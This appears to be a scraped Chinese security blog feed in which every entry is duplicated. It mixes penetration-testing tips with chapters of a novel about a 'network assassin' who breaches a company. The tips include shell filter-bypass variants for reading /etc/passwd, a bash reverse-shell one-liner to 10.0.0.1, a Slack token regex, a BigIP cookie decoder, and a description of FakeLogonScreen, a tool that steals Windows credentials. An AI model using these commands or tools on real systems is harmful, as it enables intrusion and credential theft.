"slack_token": "(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})"
]]>https://t.odmail.cn
https://www.mohmal.com
http://od.obagg.com
http://onedrive.readmail.net
http://xkx.me
https://t.odmail.cn
https://www.mohmal.com
http://od.obagg.com
http://onedrive.readmail.net
http://xkx.me
点此打开观看一段演示视频,需fq。
说下本文中利用场景:
针对Badusb攻击手段还有很多,利用场景也还有,这里仅列出与本文有关的部分。下面就让我们正式开始进入制作。
点此打开观看一段演示视频,需fq。
说下本文中利用场景:
针对Badusb攻击手段还有很多,利用场景也还有,这里仅列出与本文有关的部分。下面就让我们正式开始进入制作。
由于官方发布的线上地址使用了google统计,为了安全,还是自己搭建或者本地使用。本地就仅限于自己的电脑才可使用。所以搭建自己线上的可以随时使用,方便许多。同时配合Open in CyberChef这个浏览器插件就更加方便。
直接下载官方生成的包,下载地址:https://github.com/gchq/CyberChef/releases
我这里直接上传到github,并且启用github pages。然后绑定解析自己的域名即可线上访问。我这里搭建好的无google统计的地址:https://cyberchef.bacde.me
接下来安装Open in CyberChef 这个chrome插件。插件地址:https://chrome.google.com/webstore/detail/open-in-cyberchef/aandeoaihmciockajcgadkgknejppjdl/related
这样就可以直接右键发送到自己的cyberchef,方便了很多。使用效果如下:
]]>由于官方发布的线上地址使用了google统计,为了安全,还是自己搭建或者本地使用。本地就仅限于自己的电脑才可使用。所以搭建自己线上的可以随时使用,方便许多。同时配合Open in CyberChef这个浏览器插件就更加方便。
直接下载官方生成的包,下载地址:https://github.com/gchq/CyberChef/releases
我这里直接上传到github,并且启用github pages。然后绑定解析自己的域名即可线上访问。我这里搭建好的无google统计的地址:https://cyberchef.bacde.me
接下来安装Open in CyberChef 这个chrome插件。插件地址:https://chrome.google.com/webstore/detail/open-in-cyberchef/aandeoaihmciockajcgadkgknejppjdl/related
这样就可以直接右键发送到自己的cyberchef,方便了很多。使用效果如下:
]]>真正的牢狱是恐惧
而真正的自由是
免于恐惧的自由
——昂山素季
近几年北京下雪的场景比较罕见,不过今年似乎是个以外,这已经是北京的第三场雪了。而中国最传统的节日——春节也即将到来。
王梓坐在不知通往哪里的车,看着窗外的大雪,回忆起了10年前的冬天:同样是下雪天,而他穿着单薄的衣服,刚刚从网吧里出来。而此时的他已经没有钱了。因为经常来这家网吧,他跟网吧的老板比较熟,他曾经跟老板商量,能不能赊账。当时网吧老板直接就给拒绝了,并摆出了一副没有商量的姿态。网吧老板知道王梓的父亲跟母亲离婚,而父亲整日无所事事,只会到处去骗点钱,然后买酒,赌博。10年前的王梓还在上初中,整天不好好学习,沉迷于网络游戏中,但是因为穷,父亲给的钱不多,也没多少时间上网。每次从网吧出来都要走着回家。
]]>真正的牢狱是恐惧
而真正的自由是
免于恐惧的自由
——昂山素季
近几年北京下雪的场景比较罕见,不过今年似乎是个以外,这已经是北京的第三场雪了。而中国最传统的节日——春节也即将到来。
王梓坐在不知通往哪里的车,看着窗外的大雪,回忆起了10年前的冬天:同样是下雪天,而他穿着单薄的衣服,刚刚从网吧里出来。而此时的他已经没有钱了。因为经常来这家网吧,他跟网吧的老板比较熟,他曾经跟老板商量,能不能赊账。当时网吧老板直接就给拒绝了,并摆出了一副没有商量的姿态。网吧老板知道王梓的父亲跟母亲离婚,而父亲整日无所事事,只会到处去骗点钱,然后买酒,赌博。10年前的王梓还在上初中,整天不好好学习,沉迷于网络游戏中,但是因为穷,父亲给的钱不多,也没多少时间上网。每次从网吧出来都要走着回家。
]]>IFS=,;`cat<<<cat,/etc/passwd`
cat$IFS/etc/passwd
cat${IFS}/etc/passwd
cat</etc/passwd
{cat,/etc/passwd}
X=$'cat\x20/etc/passwd'&&$X
经过测试,除最后一条在mac osx下执行失败,这些命令在ubuntu 19.10和centos7下均执行成功。在mac osx系统下系统会将cat\x20/etc/passwd当成一个可执行文件,会提示No such file or directory。
]]>IFS=,;`cat<<<cat,/etc/passwd`
cat$IFS/etc/passwd
cat${IFS}/etc/passwd
cat</etc/passwd
{cat,/etc/passwd}
X=$'cat\x20/etc/passwd'&&$X
经过测试,除最后一条在mac osx下执行失败,这些命令在ubuntu 19.10和centos7下均执行成功。在mac osx系统下系统会将cat\x20/etc/passwd当成一个可执行文件,会提示No such file or directory。
]]>结果往往在一个人做选择的时候就已经注定。危险正在一点一点向王梓靠近。买家提出的线下交易,对于网络杀手走入现实,那么就以为着自杀。羸弱的王梓,能打得过谁呢。除此之外,还很有可能就像阿桑奇被捕时的样子。那一副银白色手镯想想都觉得冰冷。王梓不禁打了一个冷颤。
当下,王梓没有太多的时间想这些,他必须要走下去。就算没有出路,那么也要走出一条自己的路。
普通的夜晚,大多数人已进入梦乡。王梓在电脑前敲击着键盘,眼镜上可以看到映射出的一行行代码,电脑的usb口上连接着一台树莓派上。此时编写的程序就是即将在这台微型电脑上运行的。流动的代码仿佛在与时间赛跑,慢一步就可能被超过而崩溃。
不知不觉,清晨的朝阳照亮了阳台,温暖而不炙热。随着最后一次回车键按响,程序也可以正常运行起来。就要离开这里了,收起桌上的两台笔记本电脑、U盘、望远镜、还有插在电脑上的树莓派装到背包里。将手机放到了微波炉里,并放在了电脑旁。王梓走出房子,电脑正常运行着。
站在天台上,阳光照射全身,一股暖意袭遍王梓的全身。好难得的时光。可惜,马上就要走了。王梓找了快隐蔽的可以放进树莓派的地方,把树莓派放好,然后把太阳能天池板放到外面。可以为树莓派续航。
王梓拿起了一部新手机,拨通了小楠的电话。响了三声,电话接通了。传来了带有起床气的一声喂,哪位?。
]]>结果往往在一个人做选择的时候就已经注定。危险正在一点一点向王梓靠近。买家提出的线下交易,对于网络杀手走入现实,那么就以为着自杀。羸弱的王梓,能打得过谁呢。除此之外,还很有可能就像阿桑奇被捕时的样子。那一副银白色手镯想想都觉得冰冷。王梓不禁打了一个冷颤。
当下,王梓没有太多的时间想这些,他必须要走下去。就算没有出路,那么也要走出一条自己的路。
普通的夜晚,大多数人已进入梦乡。王梓在电脑前敲击着键盘,眼镜上可以看到映射出的一行行代码,电脑的usb口上连接着一台树莓派上。此时编写的程序就是即将在这台微型电脑上运行的。流动的代码仿佛在与时间赛跑,慢一步就可能被超过而崩溃。
不知不觉,清晨的朝阳照亮了阳台,温暖而不炙热。随着最后一次回车键按响,程序也可以正常运行起来。就要离开这里了,收起桌上的两台笔记本电脑、U盘、望远镜、还有插在电脑上的树莓派装到背包里。将手机放到了微波炉里,并放在了电脑旁。王梓走出房子,电脑正常运行着。
站在天台上,阳光照射全身,一股暖意袭遍王梓的全身。好难得的时光。可惜,马上就要走了。王梓找了快隐蔽的可以放进树莓派的地方,把树莓派放好,然后把太阳能天池板放到外面。可以为树莓派续航。
王梓拿起了一部新手机,拨通了小楠的电话。响了三声,电话接通了。传来了带有起床气的一声喂,哪位?。
]]>最近发现一款工具,可以解BigIP的cookie,以此获取内网ip或者真实ip地址。这款工具名叫rabid,是ruby语言编写,支持4种cookie格式。github地址:https://github.com/Orange-Cyberdefense/rabid
工具使用ruby编写,需要ruby 2.4以上版本的环境。首先要保证安装好ruby。然后使用gem安装包
gem install rabid
安装完成后,可以使用ruby包含该库,也可以直接运行命令执行。
命令示例如下:
rabid 'BIGipServer~FinanceAndAdminWeb~fo.unc.edu=105389996.20480.0000'
上面的参数就是set-cookie的值。
运行结果(运行环境macos,ruby 2.6.3):
]]>最近发现一款工具,可以解BigIP的cookie,以此获取内网ip或者真实ip地址。这款工具名叫rabid,是ruby语言编写,支持4种cookie格式。github地址:https://github.com/Orange-Cyberdefense/rabid
工具使用ruby编写,需要ruby 2.4以上版本的环境。首先要保证安装好ruby。然后使用gem安装包
gem install rabid
安装完成后,可以使用ruby包含该库,也可以直接运行命令执行。
命令示例如下:
rabid 'BIGipServer~FinanceAndAdminWeb~fo.unc.edu=105389996.20480.0000'
上面的参数就是set-cookie的值。
运行结果(运行环境macos,ruby 2.6.3):
]]>下午两点,一架直升机停在4000米的高空中,王梓手握着飞机舱门上的把手,耳边是螺旋桨旋转发出的轰隆声,身体下方的是距离4000米高的海岸。背后的老外对他喊的话,他已经听不清楚。撒开手,他与身后的老外一起跳下飞机。突然间,王梓大脑一片空白,心感觉也要从嗓子眼中蹦出去,但很快他感觉到的是身体极速下坠的失重感。王梓闭上了眼睛,脑海中浮现出他拿到的那份资料,文件里一个个名字,以及记录的时间和地点,让他产生了恐惧,这次他犹豫了,不知道是否要继续下去。过了几秒,他身后的老外打开了什么东西,双腿突然向被甩出去一样,降落的速度慢了一些。但是,下降的速度还是会形成很大的气流,吹的他脸部、胳膊都变形了。他睁开了眼睛,阳光照射下的海洋、沙滩、树木、草地尽收眼底。王梓想:“这就是上帝视角吧”。这种居高临下的感觉,是前所未有的,那种强者才有的孤独感更加的强烈。
男人的天堂——芭堤雅。夜晚降临,这座城市才真正的迎来高潮。你所看到大街上的美女不一定是个女人。倘若你走上路上,坐在按摩店门口的泰国中年女子拉着你的手叫你老公或者老板。也会看到欧美中年肥胖男子手里搂着他们买来的泰国老婆。当然,街上的中国人也不少。近些年来大陆来东南亚的游客越拉越多。王梓坐在酒吧的一个角落里,独自一人喝着酒。他还在犹豫。桌上的酒已经喝的差不多了,他看着手中的酒杯。然后猛地的一口将杯中酒全部喝完。轻轻的放下酒杯,起身走出酒吧,他已经做出了决定了。
]]>下午两点,一架直升机停在4000米的高空中,王梓手握着飞机舱门上的把手,耳边是螺旋桨旋转发出的轰隆声,身体下方的是距离4000米高的海岸。背后的老外对他喊的话,他已经听不清楚。撒开手,他与身后的老外一起跳下飞机。突然间,王梓大脑一片空白,心感觉也要从嗓子眼中蹦出去,但很快他感觉到的是身体极速下坠的失重感。王梓闭上了眼睛,脑海中浮现出他拿到的那份资料,文件里一个个名字,以及记录的时间和地点,让他产生了恐惧,这次他犹豫了,不知道是否要继续下去。过了几秒,他身后的老外打开了什么东西,双腿突然向被甩出去一样,降落的速度慢了一些。但是,下降的速度还是会形成很大的气流,吹的他脸部、胳膊都变形了。他睁开了眼睛,阳光照射下的海洋、沙滩、树木、草地尽收眼底。王梓想:“这就是上帝视角吧”。这种居高临下的感觉,是前所未有的,那种强者才有的孤独感更加的强烈。
男人的天堂——芭堤雅。夜晚降临,这座城市才真正的迎来高潮。你所看到大街上的美女不一定是个女人。倘若你走上路上,坐在按摩店门口的泰国中年女子拉着你的手叫你老公或者老板。也会看到欧美中年肥胖男子手里搂着他们买来的泰国老婆。当然,街上的中国人也不少。近些年来大陆来东南亚的游客越拉越多。王梓坐在酒吧的一个角落里,独自一人喝着酒。他还在犹豫。桌上的酒已经喝的差不多了,他看着手中的酒杯。然后猛地的一口将杯中酒全部喝完。轻轻的放下酒杯,起身走出酒吧,他已经做出了决定了。
]]>这是一个最好的时代,这是一个最坏的时代;
这是一个智慧的年代,这是一个愚蠢的年代;
这是一个光明的季节,这是一个黑暗的季节;
这是希望之春,这是失望之冬;
人们面前应有尽有,人们面前一无所有;
人们正踏上天堂之路,人们正走向地狱之门。
——《双城记》狄更斯
入侵的路从来就不是平坦的,这取决实施入侵的人。黑客通常会找到别人看不到的路通往最终的目标。而这次是一个庞大的集团,尽管入口可能很多,但是许多条路都纷繁复杂,有些甚至可能是甜蜜的陷阱,又或者是达不到最终的终点。
面对如此庞大的集团,除了自动化的信息收集系统,需要大量的人为的将这些信息进行提取、组合,制定入侵的方案。从而用最短的事件达到目标。盲目的去乱碰无异于浪费时间与生命。
是否是因为最近几个月拒绝了任务让自己做出如此不合常规的操作?王梓内心中开始嘲笑起自己之前的愚蠢做法。这种情况对于一名职业网络杀手来说是一个危险的信号。他不得不重视起来并将自己紧绷起来,在内心中,此次的入侵绝对不能掉以轻心。
]]>这是一个最好的时代,这是一个最坏的时代;
这是一个智慧的年代,这是一个愚蠢的年代;
这是一个光明的季节,这是一个黑暗的季节;
这是希望之春,这是失望之冬;
人们面前应有尽有,人们面前一无所有;
人们正踏上天堂之路,人们正走向地狱之门。
——《双城记》狄更斯
入侵的路从来就不是平坦的,这取决实施入侵的人。黑客通常会找到别人看不到的路通往最终的目标。而这次是一个庞大的集团,尽管入口可能很多,但是许多条路都纷繁复杂,有些甚至可能是甜蜜的陷阱,又或者是达不到最终的终点。
面对如此庞大的集团,除了自动化的信息收集系统,需要大量的人为的将这些信息进行提取、组合,制定入侵的方案。从而用最短的事件达到目标。盲目的去乱碰无异于浪费时间与生命。
是否是因为最近几个月拒绝了任务让自己做出如此不合常规的操作?王梓内心中开始嘲笑起自己之前的愚蠢做法。这种情况对于一名职业网络杀手来说是一个危险的信号。他不得不重视起来并将自己紧绷起来,在内心中,此次的入侵绝对不能掉以轻心。
]]>使用方法:
安装impacket库
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
python setup.py install
直接使用pip安装的不行,所以clone最新版本的,然后安装,在Mac系统下需要sudo权限。
安装成功后,下载该代码。执行如下命令:
]]>使用方法:
安装impacket库
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
python setup.py install
直接使用pip安装的不行,所以clone最新版本的,然后安装,在Mac系统下需要sudo权限。
安装成功后,下载该代码。执行如下命令:
]]>夜深了,天气有些阴沉,有些发闷,让人感觉呼吸困难。路上还有几个刚刚下班的人往家里走,他们看上去有些疲惫,不时有几辆车呼啸而过。没过多久,狂风大作,电闪雷鸣,路边的树枝开始疯狂的摇头。很快无情的雨点从天空中落下,打在了正在赶路人的身上,人们纷纷拿着自己的包顶在头顶奔跑起来。这突如其来的一场大雨,拦住了深夜要赶回家的人,也惊醒了许多刚刚入睡的人们,还有那些害怕打雷无法入睡的人们。
风雨总是短暂的,下了一整夜的雨,清晨的空气变得清新起来,王梓伸了一个懒腰,然后拉开了窗帘,外面的阳光飞速的跑进屋内,填满整个卧室。打开窗,一股清爽的空气扑面而来,瞬间让人神清气爽。风雨过后总是会迎来美好,又或者给人们带来些许惊喜,比如雨后彩虹。
在这样一个美好的早晨,给人的心情也自然是不一样的,王梓准备下楼去公园转转。宅了许久,也应该出去呼吸一下外面的新鲜空气了。简单洗漱下,换了件宽松的衣服王梓救下楼了。
公园内都是些年纪较大的人,有的在空地上打羽毛球,有的老大爷站在树旁,不断用自己侧面的身体撞向树,然后弹回来,在撞过去,一会在用后背重复刚才的动作。有的老大妈则站在树下练习着嗓子。王梓心里想着当自己老了的时候是否也是差不多的样子,想想,自己摇摇头笑了。继续向前走,不远处可以看到有一群老年人,他们动作轻柔又缓慢,有的还穿着武术服,旁边有一个小音箱播放着音乐。在看最前面的那个人,大概60岁左右的样子,穿了一身黑色武术服,深深的眉毛,眼睛随着他的手移动着,他的动作圆活,连绵不绝,步伐轻盈如行云流水。王梓被这个老大爷吸引住了,觉得很帅气,便多看了会,心中感叹,原来太极拳是这样的优美。过了10多分钟结束了。老大爷走到旁边的凳子旁,从包里拿出一条毛巾来擦头上的汗。
“大爷,您打的拳简直太漂亮了。”王梓走上前去赞美起大爷。
“怎么,小伙子,你感兴趣?”大爷反问道。
“我是看您打,真的很美。吸引了我。” 王梓回复道。
“太极拳需要常年联系,对人身体有很大的益处,别人动作轻柔缓慢,但是,把每一个动作做到优雅,灵活,必须要要用力。你看我这么大年纪,身体一直很好,比起你们一些年轻人都要好呢。就说你们现在这些年轻人整天就知道对着电脑和手机,又爱熬夜,身体还不如我这个老头子呢。”
]]>夜深了,天气有些阴沉,有些发闷,让人感觉呼吸困难。路上还有几个刚刚下班的人往家里走,他们看上去有些疲惫,不时有几辆车呼啸而过。没过多久,狂风大作,电闪雷鸣,路边的树枝开始疯狂的摇头。很快无情的雨点从天空中落下,打在了正在赶路人的身上,人们纷纷拿着自己的包顶在头顶奔跑起来。这突如其来的一场大雨,拦住了深夜要赶回家的人,也惊醒了许多刚刚入睡的人们,还有那些害怕打雷无法入睡的人们。
风雨总是短暂的,下了一整夜的雨,清晨的空气变得清新起来,王梓伸了一个懒腰,然后拉开了窗帘,外面的阳光飞速的跑进屋内,填满整个卧室。打开窗,一股清爽的空气扑面而来,瞬间让人神清气爽。风雨过后总是会迎来美好,又或者给人们带来些许惊喜,比如雨后彩虹。
在这样一个美好的早晨,给人的心情也自然是不一样的,王梓准备下楼去公园转转。宅了许久,也应该出去呼吸一下外面的新鲜空气了。简单洗漱下,换了件宽松的衣服王梓救下楼了。
公园内都是些年纪较大的人,有的在空地上打羽毛球,有的老大爷站在树旁,不断用自己侧面的身体撞向树,然后弹回来,在撞过去,一会在用后背重复刚才的动作。有的老大妈则站在树下练习着嗓子。王梓心里想着当自己老了的时候是否也是差不多的样子,想想,自己摇摇头笑了。继续向前走,不远处可以看到有一群老年人,他们动作轻柔又缓慢,有的还穿着武术服,旁边有一个小音箱播放着音乐。在看最前面的那个人,大概60岁左右的样子,穿了一身黑色武术服,深深的眉毛,眼睛随着他的手移动着,他的动作圆活,连绵不绝,步伐轻盈如行云流水。王梓被这个老大爷吸引住了,觉得很帅气,便多看了会,心中感叹,原来太极拳是这样的优美。过了10多分钟结束了。老大爷走到旁边的凳子旁,从包里拿出一条毛巾来擦头上的汗。
“大爷,您打的拳简直太漂亮了。”王梓走上前去赞美起大爷。
“怎么,小伙子,你感兴趣?”大爷反问道。
“我是看您打,真的很美。吸引了我。” 王梓回复道。
“太极拳需要常年联系,对人身体有很大的益处,别人动作轻柔缓慢,但是,把每一个动作做到优雅,灵活,必须要要用力。你看我这么大年纪,身体一直很好,比起你们一些年轻人都要好呢。就说你们现在这些年轻人整天就知道对着电脑和手机,又爱熬夜,身体还不如我这个老头子呢。”
]]>王梓在写着代码,旁边的两个同事在讨论。
同事小王先开口说道:“听说最近公司要裁员,咱们哥几个可得好好表现下,别被裁了,特殊时期可别往枪口上撞啊。”
“你这消息真的假的啊?”同事小张半信半疑地问道。
“这还能有假,其他几个部门已经有人被开除了。”
“那你是从哪里得到的消息啊?”
“另外一个部门的同事跟我说的,消息绝对可靠。没准啊,下一个就该我们部门喽~”
此时王梓部门的领导走了过来,旁边的两个人赶紧装作忙工作的样子。
“王梓,你到我办公室来一趟。”
王梓起身,朝领导办公室走去。旁边的两个同事面面相觑。小张先说话了:“你这乌鸦嘴,还真是,看来他这次要被开喽,他写的代码经常有bug(注解1:),有几次还是我给他调好的呢。平时就不爱说话,也不跟人交流,难怪技术那么差。”
“是啊,我也给他改过几次呢。咱们先准备准备,领导如果找咱们了,咱们跟领导求求情。”
“嗯,好。”
王梓来到领导办公室。
]]>王梓在写着代码,旁边的两个同事在讨论。
同事小王先开口说道:“听说最近公司要裁员,咱们哥几个可得好好表现下,别被裁了,特殊时期可别往枪口上撞啊。”
“你这消息真的假的啊?”同事小张半信半疑地问道。
“这还能有假,其他几个部门已经有人被开除了。”
“那你是从哪里得到的消息啊?”
“另外一个部门的同事跟我说的,消息绝对可靠。没准啊,下一个就该我们部门喽~”
此时王梓部门的领导走了过来,旁边的两个人赶紧装作忙工作的样子。
“王梓,你到我办公室来一趟。”
王梓起身,朝领导办公室走去。旁边的两个同事面面相觑。小张先说话了:“你这乌鸦嘴,还真是,看来他这次要被开喽,他写的代码经常有bug(注解1:),有几次还是我给他调好的呢。平时就不爱说话,也不跟人交流,难怪技术那么差。”
“是啊,我也给他改过几次呢。咱们先准备准备,领导如果找咱们了,咱们跟领导求求情。”
“嗯,好。”
王梓来到领导办公室。
]]>暗潮涌动,当浮现出来的那一刻,必定是一场惊涛骇浪。50亿的信息泄漏已经够让人膛目结舌。似乎国内因为这一切变得平静,而在国际上,维基解密网站发布CIA使用的黑客工具包,一群网络中一名名为“影子”的组织劲爆出美国NSA使用的网络武器库。这个超级网络武器库对黑客们来说无疑是一场饕餮大餐。那黑夜中无数双眼睛变得无比的亮,各自忙碌着。
王梓看着这个超级武器库,内心大吃一惊,技术超前,覆盖全面,内容丰富。这注定是一个无眠的夜晚,王梓不断对其进行分析,并完善到自己的武器库中。
不止一次让王梓深深的感觉到人外有人,天外有天。单单靠他一个人不行,如今已不是个人英雄主义的时代。他需要伙伴,一起并肩作战的伙伴。就如网络武器库就是一支有精英队伍所打造出来的。而王梓就要建立一支这样的民间队伍。
太阳升起又落下,王梓站起身,伸了伸懒腰。看了下时间,晚上8点钟。正好可以下楼出去,顺便吃点东西。这个时候的晚上生活很是丰富。有穿着时尚又性感的美女在遛狗,有父母带着小孩子在散步的,有说有笑,而在不远处播放着最炫民族风,大妈们正在起劲的跳着广场舞,还有坐在小区椅子的大爷。王梓走在路上,徐徐的微风吹来,吹散了一脸的疲倦,顿时精神起来。
]]>暗潮涌动,当浮现出来的那一刻,必定是一场惊涛骇浪。50亿的信息泄漏已经够让人膛目结舌。似乎国内因为这一切变得平静,而在国际上,维基解密网站发布CIA使用的黑客工具包,一群网络中一名名为“影子”的组织劲爆出美国NSA使用的网络武器库。这个超级网络武器库对黑客们来说无疑是一场饕餮大餐。那黑夜中无数双眼睛变得无比的亮,各自忙碌着。
王梓看着这个超级武器库,内心大吃一惊,技术超前,覆盖全面,内容丰富。这注定是一个无眠的夜晚,王梓不断对其进行分析,并完善到自己的武器库中。
不止一次让王梓深深的感觉到人外有人,天外有天。单单靠他一个人不行,如今已不是个人英雄主义的时代。他需要伙伴,一起并肩作战的伙伴。就如网络武器库就是一支有精英队伍所打造出来的。而王梓就要建立一支这样的民间队伍。
太阳升起又落下,王梓站起身,伸了伸懒腰。看了下时间,晚上8点钟。正好可以下楼出去,顺便吃点东西。这个时候的晚上生活很是丰富。有穿着时尚又性感的美女在遛狗,有父母带着小孩子在散步的,有说有笑,而在不远处播放着最炫民族风,大妈们正在起劲的跳着广场舞,还有坐在小区椅子的大爷。王梓走在路上,徐徐的微风吹来,吹散了一脸的疲倦,顿时精神起来。
]]>首先询问了系统部人员的一些网络架构。以及现在企业内部所做的全防护措施。接着他有询问了更加具体的信息,其中包含了文件保存的位置,以及发生的时间点等。通过快速的对话沟通,Jack了解了对方的网络一个大概的安全状况。
他跟对方的技术负责人说道:“你们现在的网络情况相对来说做的非常不错,你们目前忽略了公司员工的安全意识,以及目前网络并没有对外流出数据进行一个很好的监控。这使的黑客有机可乘。”
“哎呦,您真的是太专业的,我们已经把我们所了解到的都利用上了,同时我们也经常找安全团队来对我们的系统进行入侵测试。然而他们并没有发现什么内容。发现的我们也都已经修复了。”系统部负责人拍了下大腿,高兴的对Jack说道。因为他似乎看到了希望,看到了眼前这个人可以查出入侵者,这样他也就不会被炒鱿鱼了。
“如果真的如你说的这般,这次的攻击者也是花了很大的代价来入侵你们,看来对方是真的下了血本,想置你们公司于死地啊。”放心,这次我一定要帮助你们找到真凶。他更加的想要知道究竟是什么样人了。
“能有您的加入,那真的是太好了,有什么需要帮助的,需要我们提供的,您就尽管说。我们一定全力配合您。”
“好,那我们废话不多说,开始吧。”
“好,小王,给Jack倒一杯咖啡。”
说着Jack找了个空位置,很不客气的就坐下了,从他的背包中拿出了自己的thinkpad笔记本。上面有一个blackhat的贴纸,看上去非常的酷。
]]>首先询问了系统部人员的一些网络架构。以及现在企业内部所做的全防护措施。接着他有询问了更加具体的信息,其中包含了文件保存的位置,以及发生的时间点等。通过快速的对话沟通,Jack了解了对方的网络一个大概的安全状况。
他跟对方的技术负责人说道:“你们现在的网络情况相对来说做的非常不错,你们目前忽略了公司员工的安全意识,以及目前网络并没有对外流出数据进行一个很好的监控。这使的黑客有机可乘。”
“哎呦,您真的是太专业的,我们已经把我们所了解到的都利用上了,同时我们也经常找安全团队来对我们的系统进行入侵测试。然而他们并没有发现什么内容。发现的我们也都已经修复了。”系统部负责人拍了下大腿,高兴的对Jack说道。因为他似乎看到了希望,看到了眼前这个人可以查出入侵者,这样他也就不会被炒鱿鱼了。
“如果真的如你说的这般,这次的攻击者也是花了很大的代价来入侵你们,看来对方是真的下了血本,想置你们公司于死地啊。”放心,这次我一定要帮助你们找到真凶。他更加的想要知道究竟是什么样人了。
“能有您的加入,那真的是太好了,有什么需要帮助的,需要我们提供的,您就尽管说。我们一定全力配合您。”
“好,那我们废话不多说,开始吧。”
“好,小王,给Jack倒一杯咖啡。”
说着Jack找了个空位置,很不客气的就坐下了,从他的背包中拿出了自己的thinkpad笔记本。上面有一个blackhat的贴纸,看上去非常的酷。
]]>寂静的黑夜,人们的呼声飘荡在夜空中。
北京市朝阳区酒仙桥路阳光上东小区,在某间屋子里,一个人人正在神情专注的盯着电脑,不断的发出鼠标点击和敲击键盘的噼啪声,那声音清脆极了,犹如美妙的音符一般。
王梓正在探寻对方的公司内部网络,寻找着重要信息。看似平静的夜晚,而危险正在通过网络悄无声息的靠近。在未来的一个月内不知道会有多少人面临着失业,抑或者有人因此而自杀,也不知道多少病人因为药厂不能提供一些药物而加重病情,甚至死去。人们无法预测自己的未来和控制未来。杀手掌握着别人的未来,可是对于杀手抑或者网络杀手来说,他们自己的未来,也同样掌握在别人的手里。
人们还不知道危险就在自己的身边,人的生命有时候就是这样的脆弱。人们的命运都掌握在别人手里,在这大千世界面前我们都是弱者。即使强者也只是暂时的,不断变换着的。
王梓通过之前的几台员工电脑,很顺利的便控制了对方的crm(客户关系管理系统)、文件备份管理系统。此时的他正在准备获取到公司内部网络的最高管理权限(域控制权限)。黑色窗口,白色字符,不断闪现的流动的一串串字符。每一次的键盘敲击,都是在与目标靠近。
]]>寂静的黑夜,人们的呼声飘荡在夜空中。
北京市朝阳区酒仙桥路阳光上东小区,在某间屋子里,一个人人正在神情专注的盯着电脑,不断的发出鼠标点击和敲击键盘的噼啪声,那声音清脆极了,犹如美妙的音符一般。
王梓正在探寻对方的公司内部网络,寻找着重要信息。看似平静的夜晚,而危险正在通过网络悄无声息的靠近。在未来的一个月内不知道会有多少人面临着失业,抑或者有人因此而自杀,也不知道多少病人因为药厂不能提供一些药物而加重病情,甚至死去。人们无法预测自己的未来和控制未来。杀手掌握着别人的未来,可是对于杀手抑或者网络杀手来说,他们自己的未来,也同样掌握在别人的手里。
人们还不知道危险就在自己的身边,人的生命有时候就是这样的脆弱。人们的命运都掌握在别人手里,在这大千世界面前我们都是弱者。即使强者也只是暂时的,不断变换着的。
王梓通过之前的几台员工电脑,很顺利的便控制了对方的crm(客户关系管理系统)、文件备份管理系统。此时的他正在准备获取到公司内部网络的最高管理权限(域控制权限)。黑色窗口,白色字符,不断闪现的流动的一串串字符。每一次的键盘敲击,都是在与目标靠近。
]]>在网络的世界中也有这样的一种人,他们不杀人,他们也不需要在现实中隐藏包装自己,因为他们只存在于虚拟的网络世界中,很少有人知道他们的真面目。他们同样在夜间才进行活动,他们的任务是窃取企业,政府的最高机密信息。更准确的说,可以叫他们为网络间谍。他们是这个网络上的杀手,他们不会亲自杀人,却因为他们盗取的信息,有他们的买家来去做一些伤天害理的事情,使很多人因此而家破人亡。不过,对于这个世界来说,每个人都有着他自己的命运,弱者注定要被这个社会淘汰,而这个也正是杀手们所认同的,在杀手已活着网络杀手看来,他们可以杀死(入侵的目标)的人都是弱者。他们信奉他们自己可以改变或控制别人的命运,甚至大多数人的命运。
“早~”,小楠对刚刚到公司的王梓打招呼。王梓则开心的笑笑,作为回应。
王梓是一家中日合资的中型软件公司的程序员。性格内向,腼腆。长相一般,在嘴巴的右上角有一颗痦子。在这家拥有数十位的程序员的公司,每个人都只负责各自的一部分,王梓在这里是其中普普通通的一员,公司部门内部竞争激烈,升职也比较困难,王梓不时还会犯些小错误,因为被领导破口大骂。对此王梓什么都不说,只在一旁听着,完事后继续回到座位上默默的工作。这时候,作为翻译的小楠总会过来安慰王梓。王梓也总说是他自己的错误。不怪领导发脾气。
]]>在网络的世界中也有这样的一种人,他们不杀人,他们也不需要在现实中隐藏包装自己,因为他们只存在于虚拟的网络世界中,很少有人知道他们的真面目。他们同样在夜间才进行活动,他们的任务是窃取企业,政府的最高机密信息。更准确的说,可以叫他们为网络间谍。他们是这个网络上的杀手,他们不会亲自杀人,却因为他们盗取的信息,有他们的买家来去做一些伤天害理的事情,使很多人因此而家破人亡。不过,对于这个世界来说,每个人都有着他自己的命运,弱者注定要被这个社会淘汰,而这个也正是杀手们所认同的,在杀手已活着网络杀手看来,他们可以杀死(入侵的目标)的人都是弱者。他们信奉他们自己可以改变或控制别人的命运,甚至大多数人的命运。
“早~”,小楠对刚刚到公司的王梓打招呼。王梓则开心的笑笑,作为回应。
王梓是一家中日合资的中型软件公司的程序员。性格内向,腼腆。长相一般,在嘴巴的右上角有一颗痦子。在这家拥有数十位的程序员的公司,每个人都只负责各自的一部分,王梓在这里是其中普普通通的一员,公司部门内部竞争激烈,升职也比较困难,王梓不时还会犯些小错误,因为被领导破口大骂。对此王梓什么都不说,只在一旁听着,完事后继续回到座位上默默的工作。这时候,作为翻译的小楠总会过来安慰王梓。王梓也总说是他自己的错误。不怪领导发脾气。
]]>网站主页打开后就是一个输入框。输入命令后,就会给出解析的结果。结果包含了解析的结果,并在下面给出了详细的说明。很方便。例如我们以bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
为例(如下图),很酷~
网站主页打开后就是一个输入框。输入命令后,就会给出解析的结果。结果包含了解析的结果,并在下面给出了详细的说明。很方便。例如我们以bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
为例(如下图),很酷~
FakeLogonScreen这个程序是用于伪造windows登录凭证以获取系统登录密码。它会获取当前系统配置的背景图片,这样显得更加真实,成功率也会更高。
另外,该程序会对输入的密码进行Active Directory或本地计算机的认证,以确保窃取密码的准确性。它可以显示在控制台,也可以保存早文件远程系统的硬盘上。
这个软件的好处就是可以与其它工具配合使用,可以直接通过内存执行(无文件)。比如可以配合Cobalt Strike的execute-assembly来执行。
由于使用c#编写,需要系统中有.net framework框架。这里测试windows10和windows7,系统均为64位。在其release的版本中,作者给出来.net framework3.5和4.5的可执行程序。适用于windows7 和windows10等情况。实际中可根据实际情况进行选择。
